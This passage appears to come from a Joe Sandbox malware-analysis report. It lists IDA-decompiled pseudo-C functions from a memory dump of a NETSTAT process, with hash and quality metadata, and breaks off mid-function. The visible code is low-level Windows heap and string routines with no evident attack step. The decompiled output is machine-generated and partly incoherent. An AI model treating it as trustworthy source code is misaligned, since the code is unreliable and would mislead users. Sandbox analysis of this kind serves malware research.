                                      								while(1) {
                                      									L22:
                                      									_t89 =  *0x2f57b9c; // 0x0
                                      									_t92 = L02E84620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                      									_t124[2] = _t92;
                                      									if(_t92 == 0) {
                                      										break;
                                      									}
                                      									_t112 =  &_v8;
                                      									_push( &_v8);
                                      									_push(_t92);
                                      									_push(_v8);
                                      									_push(_t124[3]);
                                      									_push(0);
                                      									_push( *_t124);
                                      									_t122 = E02EA9910();
                                      									if(_t122 != 0xc0000023) {
                                      										goto L26;
                                      									}
                                      									L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                      								}
                                      								_t122 = 0xc0000017;
                                      								goto L26;
                                      							}
                                      							_t119 = 0;
                                      							do {
                                      								_t114 = _t124[3];
                                      								_t119 = _t119 + 0xc;
                                      								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                      								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                      								_t123 = _t123 + 1;
                                      								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                      							} while (_t123 < _t108);
                                      							goto L21;
                                      						}
                                      						_push(0x28);
                                      						_push(3);
                                      						_t122 = E02E6A7B0();
                                      						if(_t122 < 0) {
                                      							goto L33;
                                      						}
                                      						_t124[4] = _t124[4] | 0x00000001;
                                      						goto L18;
                                      					}
                                      					if((_t106 & 0x00000001) == 0) {
                                      						_t115 = 0x28;
                                      						_t122 = E02EFE7D3(_t115, _t124);
                                      						if(_t122 < 0) {
                                      							L9:
                                      							_push(_t124);
                                      							_push(0);
                                      							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                      							goto L37;
                                      						}
                                      						L12:
                                      						if( *_t124 != 0) {
                                      							goto L18;
                                      						}
                                      						goto L13;
                                      					}
                                      					_t15 =  &(_t124[1]); // 0x4
                                      					_t117 = 4;
                                      					_t122 = E02EFE7D3(_t117, _t15);
                                      					if(_t122 >= 0) {
                                      						_t124[4] = _t124[4] | 0x00000001;
                                      						_v12 = _v12 & 0x00000000;
                                      						_push(4);
                                      						_push( &_v12);
                                      						_push(5);
                                      						_push(0xfffffffe);
                                      						E02EA95B0();
                                      						goto L12;
                                      					}
                                      					goto L9;
                                      				} else {
                                      					return 0xc0000017;
                                      				}
                                      			}





















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 29d0f6ad65f3027255d72245c31e79351d1150d564a82f63f244d7ce7017c3d5
                                      • Instruction ID: 5f9ac68808a06d2c3274540cb685ee9d3fb2bc477bb90c6dac7335191ef57aca
                                      • Opcode Fuzzy Hash: 29d0f6ad65f3027255d72245c31e79351d1150d564a82f63f244d7ce7017c3d5
                                      • Instruction Fuzzy Hash: 9371F132280B01AFDB71DF14C855F56B7E6EB48728F14D52CEB598B6A0EB71E940CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 79%
                                      			E02EE6DC9(signed int __ecx, void* __edx) {
                                      				unsigned int _v8;
                                      				intOrPtr _v12;
                                      				signed int _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				char _v32;
                                      				char _v36;
                                      				char _v40;
                                      				char _v44;
                                      				char _v48;
                                      				char _v52;
                                      				char _v56;
                                      				char _v60;
                                      				void* _t87;
                                      				void* _t95;
                                      				signed char* _t96;
                                      				signed int _t107;
                                      				signed int _t136;
                                      				signed char* _t137;
                                      				void* _t157;
                                      				void* _t161;
                                      				void* _t167;
                                      				intOrPtr _t168;
                                      				void* _t174;
                                      				void* _t175;
                                      				signed int _t176;
                                      				void* _t177;
                                      
                                      				_t136 = __ecx;
                                      				_v44 = 0;
                                      				_t167 = __edx;
                                      				_v40 = 0;
                                      				_v36 = 0;
                                      				_v32 = 0;
                                      				_v60 = 0;
                                      				_v56 = 0;
                                      				_v52 = 0;
                                      				_v48 = 0;
                                      				_v16 = __ecx;
                                      				_t87 = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                      				_t175 = _t87;
                                      				if(_t175 != 0) {
                                      					_t11 = _t175 + 0x30; // 0x30
                                      					 *((short*)(_t175 + 6)) = 0x14d4;
                                      					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                      					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                      					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                      					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                      					E02EE6B4C(_t167, _t11, 0x214,  &_v8);
                                      					_v12 = _v8 + 0x10;
                                      					_t95 = E02E87D50();
                                      					_t137 = 0x7ffe0384;
                                      					if(_t95 == 0) {
                                      						_t96 = 0x7ffe0384;
                                      					} else {
                                      						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                      					}
                                      					_push(_t175);
                                      					_push(_v12);
                                      					_push(0x402);
                                      					_push( *_t96 & 0x000000ff);
                                      					E02EA9AE0();
                                      					_t87 = L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                      					_t176 = _v16;
                                      					if((_t176 & 0x00000100) != 0) {
                                      						_push( &_v36);
                                      						_t157 = 4;
                                      						_t87 = E02EE795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                      						if(_t87 >= 0) {
                                      							_v24 = E02EE795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                      							_v28 = E02EE795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                      							_push( &_v52);
                                      							_t161 = 5;
                                      							_t168 = E02EE795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                      							_v20 = _t168;
                                      							_t107 = L02E84620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                      							_v16 = _t107;
                                      							if(_t107 != 0) {
                                      								_v8 = _v8 & 0x00000000;
                                      								 *(_t107 + 0x20) = _t176;
                                      								 *((short*)(_t107 + 6)) = 0x14d5;
                                      								_t47 = _t107 + 0x24; // 0x24
                                      								_t177 = _t47;
                                      								E02EE6B4C( &_v36, _t177, 0xc78,  &_v8);
                                      								_t51 = _v8 + 4; // 0x4
                                      								_t178 = _t177 + (_v8 >> 1) * 2;
                                      								_v12 = _t51;
                                      								E02EE6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                      								_v12 = _v12 + _v8;
                                      								E02EE6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                      								_t125 = _v8;
                                      								_v12 = _v12 + _v8;
                                      								E02EE6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                      								_t174 = _v12 + _v8;
                                      								if(E02E87D50() != 0) {
                                      									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                      								}
                                      								_push(_v16);
                                      								_push(_t174);
                                      								_push(0x402);
                                      								_push( *_t137 & 0x000000ff);
                                      								E02EA9AE0();
                                      								L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                      								_t168 = _v20;
                                      							}
                                      							_t87 = L02E82400( &_v36);
                                      							if(_v24 >= 0) {
                                      								_t87 = L02E82400( &_v44);
                                      							}
                                      							if(_t168 >= 0) {
                                      								_t87 = L02E82400( &_v52);
                                      							}
                                      							if(_v28 >= 0) {
                                      								return L02E82400( &_v60);
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _t87;
                                      			}
































                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                      • Instruction ID: b908424d3d6643707d781534991491e563f26921c762450d4e30a1490ca606fb
                                      • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                      • Instruction Fuzzy Hash: FE715071A40619EFCF10DFA5C944AEEFBBAFF48714F109469E509A7250D734AA41CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 80%
                                      			E02E652A5(char __ecx) {
                                      				char _v20;
                                      				char _v28;
                                      				char _v29;
                                      				void* _v32;
                                      				void* _v36;
                                      				void* _v37;
                                      				void* _v38;
                                      				void* _v40;
                                      				void* _v46;
                                      				void* _v64;
                                      				void* __ebx;
                                      				intOrPtr* _t49;
                                      				signed int _t53;
                                      				short _t85;
                                      				signed int _t87;
                                      				signed int _t88;
                                      				signed int _t89;
                                      				intOrPtr _t101;
                                      				intOrPtr* _t102;
                                      				intOrPtr* _t104;
                                      				signed int _t106;
                                      				void* _t108;
                                      
                                      				_t93 = __ecx;
                                      				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                      				_push(_t88);
                                      				_v29 = __ecx;
                                      				_t89 = _t88 | 0xffffffff;
                                      				while(1) {
                                      					E02E7EEF0(0x2f579a0);
                                      					_t104 =  *0x2f58210; // 0x3f2bb0
                                      					if(_t104 == 0) {
                                      						break;
                                      					}
                                      					asm("lock inc dword [esi]");
                                      					_t2 = _t104 + 8; // 0x28000000
                                      					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
                                      					E02E7EB70(_t93, 0x2f579a0);
                                      					if( *((char*)(_t108 + 0xf)) != 0) {
                                      						_t101 =  *0x7ffe02dc;
                                      						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                      						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                      							L9:
                                      							_push(0);
                                      							_push(0);
                                      							_push(0);
                                      							_push(0);
                                      							_push(0x90028);
                                      							_push(_t108 + 0x20);
                                      							_push(0);
                                      							_push(0);
                                      							_push(0);
                                      							_t10 = _t104 + 4; // 0x0
                                      							_push( *_t10);
                                      							_t53 = E02EA9890();
                                      							__eflags = _t53;
                                      							if(_t53 >= 0) {
                                      								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                      								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                      									E02E7EEF0(0x2f579a0);
                                      									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                      									E02E7EB70(0, 0x2f579a0);
                                      								}
                                      								goto L3;
                                      							}
                                      							__eflags = _t53 - 0xc0000012;
                                      							if(__eflags == 0) {
                                      								L12:
                                      								_t11 = _t104 + 0xe; // 0x3f2bc802
                                      								_t13 = _t104 + 0xc; // 0x3f2bbd
                                      								_t93 = _t13;
                                      								 *((char*)(_t108 + 0x12)) = 0;
                                      								__eflags = E02E9F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
                                      								if(__eflags >= 0) {
                                      									L15:
                                      									_t102 = _v28;
                                      									 *_t102 = 2;
                                      									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                      									E02E7EEF0(0x2f579a0);
                                      									__eflags =  *0x2f58210 - _t104; // 0x3f2bb0
                                      									if(__eflags == 0) {
                                      										__eflags =  *((char*)(_t108 + 0xe));
                                      										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                      										 *0x2f58210 = _t102;
                                      										_t32 = _t102 + 0xc; // 0x0
                                      										 *_t95 =  *_t32;
                                      										_t33 = _t102 + 0x10; // 0x0
                                      										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                      										_t35 = _t102 + 4; // 0xffffffff
                                      										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                      										if(__eflags != 0) {
                                      											_t37 = _t104 + 0x10; // 0x20003f2b
                                      											_t95 =  *((intOrPtr*)( *_t37));
                                      											E02EE4888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
                                      										}
                                      										E02E7EB70(_t95, 0x2f579a0);
                                      										asm("lock xadd [esi], eax");
                                      										if(__eflags == 0) {
                                      											_t38 = _t104 + 4; // 0x0
                                      											_push( *_t38);
                                      											E02EA95D0();
                                      											L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                      											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                      										}
                                      										asm("lock xadd [esi], ebx");
                                      										__eflags = _t89 == 1;
                                      										if(_t89 == 1) {
                                      											_t41 = _t104 + 4; // 0x0
                                      											_push( *_t41);
                                      											E02EA95D0();
                                      											L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                      											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                      										}
                                      										_t49 = _t102;
                                      										L4:
                                      										return _t49;
                                      									}
                                      									E02E7EB70(_t93, 0x2f579a0);
                                      									asm("lock xadd [esi], eax");
                                      									if(__eflags == 0) {
                                      										_t25 = _t104 + 4; // 0x0
                                      										_push( *_t25);
                                      										E02EA95D0();
                                      										L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                      										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                      									}
                                      									 *_t102 = 1;
                                      									asm("lock xadd [edi], eax");
                                      									if(__eflags == 0) {
                                      										_t28 = _t102 + 4; // 0xffffffff
                                      										_push( *_t28);
                                      										E02EA95D0();
                                      										L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                      									}
                                      									continue;
                                      								}
                                      								_t15 = _t104 + 0x10; // 0x20003f2b
                                      								_t93 =  &_v20;
                                      								_t17 = _t104 + 0xe; // 0x3f2bc802
                                      								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
                                      								_t85 = 6;
                                      								_v20 = _t85;
                                      								_t87 = E02E9F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
                                      								__eflags = _t87;
                                      								if(_t87 < 0) {
                                      									goto L3;
                                      								}
                                      								 *((char*)(_t108 + 0xe)) = 1;
                                      								goto L15;
                                      							}
                                      							__eflags = _t53 - 0xc000026e;
                                      							if(__eflags != 0) {
                                      								goto L3;
                                      							}
                                      							goto L12;
                                      						}
                                      						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                      						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                      							goto L3;
                                      						} else {
                                      							goto L9;
                                      						}
                                      					}
                                      					L3:
                                      					_t49 = _t104;
                                      					goto L4;
                                      				}
                                      				_t49 = 0;
                                      				goto L4;
                                      			}


























                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6d62d75912755cc1bd585fc2ea48903decf1881795c9ea2efef34d7a744d2a85
                                      • Instruction ID: cb940c5646c3c2de24493b89aeebc40e2ee6a3423b459f458db3d1f4e05d97d4
                                      • Opcode Fuzzy Hash: 6d62d75912755cc1bd585fc2ea48903decf1881795c9ea2efef34d7a744d2a85
                                      • Instruction Fuzzy Hash: 8551EC702C4341ABD720EF64C944B27BBE5FF44758F24981EF9A987651E770E840CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02E92AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                      				signed short* _v8;
                                      				signed short* _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr* _v28;
                                      				signed int _v32;
                                      				signed int _v36;
                                      				short _t56;
                                      				signed int _t57;
                                      				intOrPtr _t58;
                                      				signed short* _t61;
                                      				intOrPtr _t72;
                                      				intOrPtr _t75;
                                      				intOrPtr _t84;
                                      				intOrPtr _t87;
                                      				intOrPtr* _t90;
                                      				signed short* _t91;
                                      				signed int _t95;
                                      				signed short* _t96;
                                      				intOrPtr _t97;
                                      				intOrPtr _t102;
                                      				signed int _t108;
                                      				intOrPtr _t110;
                                      				signed int _t111;
                                      				signed short* _t112;
                                      				void* _t113;
                                      				signed int _t116;
                                      				signed short** _t119;
                                      				short* _t120;
                                      				signed int _t123;
                                      				signed int _t124;
                                      				void* _t125;
                                      				intOrPtr _t127;
                                      				signed int _t128;
                                      
                                      				_t90 = __ecx;
                                      				_v16 = __edx;
                                      				_t108 = _a4;
                                      				_v28 = __ecx;
                                      				_t4 = _t108 - 1; // -1
                                      				if(_t4 > 0x13) {
                                      					L15:
                                      					_t56 = 0xc0000100;
                                      					L16:
                                      					return _t56;
                                      				}
                                      				_t57 = _t108 * 0x1c;
                                      				_v32 = _t57;
                                      				_t6 = _t57 + 0x2f58204; // 0x0
                                      				_t123 =  *_t6;
                                      				_t7 = _t57 + 0x2f58208; // 0x2f58207
                                      				_t8 = _t57 + 0x2f58208; // 0x2f58207
                                      				_t119 = _t8;
                                      				_v36 = _t123;
                                      				_t110 = _t7 + _t123 * 8;
                                      				_v24 = _t110;
                                      				_t111 = _a4;
                                      				if(_t119 >= _t110) {
                                      					L12:
                                      					if(_t123 != 3) {
                                      						_t58 =  *0x2f58450; // 0x3f10f2
                                      						if(_t58 == 0) {
                                      							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                      						}
                                      					} else {
                                      						_t26 = _t57 + 0x2f5821c; // 0x0
                                      						_t58 =  *_t26;
                                      					}
                                      					 *_t90 = _t58;
                                      					goto L15;
                                      				} else {
                                      					goto L2;
                                      				}
                                      				while(1) {
                                      					_t116 =  *_t61 & 0x0000ffff;
                                      					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                      					if(_t116 == _t128) {
                                      						goto L18;
                                      					}
                                      					L5:
                                      					if(_t116 >= 0x61) {
                                      						if(_t116 > 0x7a) {
                                      							_t97 =  *0x2f56d5c; // 0x7fc80654
                                      							_t72 =  *0x2f56d5c; // 0x7fc80654
                                      							_t75 =  *0x2f56d5c; // 0x7fc80654
                                      							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                      						} else {
                                      							_t116 = _t116 - 0x20;
                                      						}
                                      					}
                                      					if(_t128 >= 0x61) {
                                      						if(_t128 > 0x7a) {
                                      							_t102 =  *0x2f56d5c; // 0x7fc80654
                                      							_t84 =  *0x2f56d5c; // 0x7fc80654
                                      							_t87 =  *0x2f56d5c; // 0x7fc80654
                                      							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                      						} else {
                                      							_t128 = _t128 - 0x20;
                                      						}
                                      					}
                                      					if(_t116 == _t128) {
                                      						_t61 = _v12;
                                      						_t96 = _v8;
                                      					} else {
                                      						_t113 = _t116 - _t128;
                                      						L9:
                                      						_t111 = _a4;
                                      						if(_t113 == 0) {
                                      							_t115 =  &(( *_t119)[_t111 + 1]);
                                      							_t33 =  &(_t119[1]); // 0x100
                                      							_t120 = _a8;
                                      							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                      							_t35 = _t95 - 1; // 0xff
                                      							_t124 = _t35;
                                      							if(_t120 == 0) {
                                      								L27:
                                      								 *_a16 = _t95;
                                      								_t56 = 0xc0000023;
                                      								goto L16;
                                      							}
                                      							if(_t124 >= _a12) {
                                      								if(_a12 >= 1) {
                                      									 *_t120 = 0;
                                      								}
                                      								goto L27;
                                      							}
                                      							 *_a16 = _t124;
                                      							_t125 = _t124 + _t124;
                                      							E02EAF3E0(_t120, _t115, _t125);
                                      							_t56 = 0;
                                      							 *((short*)(_t125 + _t120)) = 0;
                                      							goto L16;
                                      						}
                                      						_t119 =  &(_t119[2]);
                                      						if(_t119 < _v24) {
                                      							L2:
                                      							_t91 =  *_t119;
                                      							_t61 = _t91;
                                      							_v12 = _t61;
                                      							_t112 =  &(_t61[_t111]);
                                      							_v8 = _t112;
                                      							if(_t61 >= _t112) {
                                      								break;
                                      							} else {
                                      								_t127 = _v16 - _t91;
                                      								_t96 = _t112;
                                      								_v20 = _t127;
                                      								_t116 =  *_t61 & 0x0000ffff;
                                      								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                      								if(_t116 == _t128) {
                                      									goto L18;
                                      								}
                                      								goto L5;
                                      							}
                                      						} else {
                                      							_t90 = _v28;
                                      							_t57 = _v32;
                                      							_t123 = _v36;
                                      							goto L12;
                                      						}
                                      					}
                                      					L18:
                                      					_t61 =  &(_t61[1]);
                                      					_v12 = _t61;
                                      					if(_t61 >= _t96) {
                                      						break;
                                      					}
                                      					_t127 = _v20;
                                      				}
                                      				_t113 = 0;
                                      				goto L9;
                                      			}







































                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9d065f5e4bd16f523660e9081c8d7430bcc1509d60a05630fd41d01a1c62e47d
                                      • Instruction ID: 7c6d4d8c5fed78b58c46d1ef415524b807b4d6ee0b77c04461f2382848421be5
                                      • Opcode Fuzzy Hash: 9d065f5e4bd16f523660e9081c8d7430bcc1509d60a05630fd41d01a1c62e47d
                                      • Instruction Fuzzy Hash: 8651AF76A405299BCF14CF2DC8A09BDB7F1BB88704715D85AEE569B310E730AE51CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			E02F2AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				void* __esi;
                                      				void* __ebp;
                                      				signed short* _t36;
                                      				signed int _t41;
                                      				char* _t42;
                                      				intOrPtr _t43;
                                      				signed int _t47;
                                      				void* _t52;
                                      				signed int _t57;
                                      				intOrPtr _t61;
                                      				signed char _t62;
                                      				signed int _t72;
                                      				signed char _t85;
                                      				signed int _t88;
                                      
                                      				_t73 = __edx;
                                      				_push(__ecx);
                                      				_t85 = __ecx;
                                      				_v8 = __edx;
                                      				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                                      				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                                      				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                      					_t57 = _t57 | 0x00000001;
                                      				}
                                      				_t88 = 0;
                                      				_t36 = 0;
                                      				_t96 = _a12;
                                      				if(_a12 == 0) {
                                      					_t62 = _a8;
                                      					__eflags = _t62;
                                      					if(__eflags == 0) {
                                      						goto L12;
                                      					}
                                      					_t52 = E02F2C38B(_t85, _t73, _t57, 0);
                                      					_t62 = _a8;
                                      					 *_t62 = _t52;
                                      					_t36 = 0;
                                      					goto L11;
                                      				} else {
                                      					_t36 = E02F2ACFD(_t85, _t73, _t96, _t57, _a8);
                                      					if(0 == 0 || 0 == 0xffffffff) {
                                      						_t72 = _t88;
                                      					} else {
                                      						_t72 =  *0x00000000 & 0x0000ffff;
                                      					}
                                      					 *_a12 = _t72;
                                      					_t62 = _a8;
                                      					L11:
                                      					_t73 = _v8;
                                      					L12:
                                      					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                                      						L19:
                                      						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                                      							L22:
                                      							_t74 = _v8;
                                      							__eflags = _v8;
                                      							if(__eflags != 0) {
                                      								L25:
                                      								__eflags = _t88 - 2;
                                      								if(_t88 != 2) {
                                      									__eflags = _t85 + 0x44 + (_t88 << 6);
                                      									_t88 = E02F2FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                                      									goto L34;
                                      								}
                                      								L26:
                                      								_t59 = _v8;
                                      								E02F2EA55(_t85, _v8, _t57);
                                      								asm("sbb esi, esi");
                                      								_t88 =  ~_t88;
                                      								_t41 = E02E87D50();
                                      								__eflags = _t41;
                                      								if(_t41 == 0) {
                                      									_t42 = 0x7ffe0380;
                                      								} else {
                                      									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      								}
                                      								__eflags =  *_t42;
                                      								if( *_t42 != 0) {
                                      									_t43 =  *[fs:0x30];
                                      									__eflags =  *(_t43 + 0x240) & 0x00000001;
                                      									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                                      										__eflags = _t88;
                                      										if(_t88 != 0) {
                                      											E02F21608(_t85, _t59, 3);
                                      										}
                                      									}
                                      								}
                                      								goto L34;
                                      							}
                                      							_push(_t62);
                                      							_t47 = E02F31536(0x2f58ae4, (_t74 -  *0x2f58b04 >> 0x14) + (_t74 -  *0x2f58b04 >> 0x14), _t88, __eflags);
                                      							__eflags = _t47;
                                      							if(_t47 == 0) {
                                      								goto L26;
                                      							}
                                      							_t74 = _v12;
                                      							_t27 = _t47 - 1; // -1
                                      							_t88 = _t27;
                                      							goto L25;
                                      						}
                                      						_t62 = _t85;
                                      						if(L02F2C323(_t62, _v8, _t57) != 0xffffffff) {
                                      							goto L22;
                                      						}
                                      						_push(_t62);
                                      						_push(_t88);
                                      						E02F2A80D(_t85, 9, _v8, _t88);
                                      						goto L34;
                                      					} else {
                                      						_t101 = _t36;
                                      						if(_t36 != 0) {
                                      							L16:
                                      							if(_t36 == 0xffffffff) {
                                      								goto L19;
                                      							}
                                      							_t62 =  *((intOrPtr*)(_t36 + 2));
                                      							if((_t62 & 0x0000000f) == 0) {
                                      								goto L19;
                                      							}
                                      							_t62 = _t62 & 0xf;
                                      							if(E02F0CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                                      								L34:
                                      								return _t88;
                                      							}
                                      							goto L19;
                                      						}
                                      						_t62 = _t85;
                                      						_t36 = E02F2ACFD(_t62, _t73, _t101, _t57, _t62);
                                      						if(_t36 == 0) {
                                      							goto L19;
                                      						}
                                      						goto L16;
                                      					}
                                      				}
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bcca728bd0ea214b2b8d09dd0d94625cb59a7df2318e789778e3d4670885eab7
                                      • Instruction ID: 6535774f3ea49c6246ed50cbcccca84e95b084f185e8395be176b7698c60b8d7
                                      • Opcode Fuzzy Hash: bcca728bd0ea214b2b8d09dd0d94625cb59a7df2318e789778e3d4670885eab7
                                      • Instruction Fuzzy Hash: 0041F972B007319BC725DA26CC94B3BB79AEF867D4F044619FB66C7290D738D809CA91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			E02E8DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                      				char _v5;
                                      				signed int _v12;
                                      				signed int* _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				void* __ebx;
                                      				void* __edi;
                                      				signed int _t54;
                                      				char* _t58;
                                      				signed int _t66;
                                      				intOrPtr _t67;
                                      				intOrPtr _t68;
                                      				intOrPtr _t72;
                                      				intOrPtr _t73;
                                      				signed int* _t75;
                                      				intOrPtr _t79;
                                      				intOrPtr _t80;
                                      				char _t82;
                                      				signed int _t83;
                                      				signed int _t84;
                                      				signed int _t88;
                                      				signed int _t89;
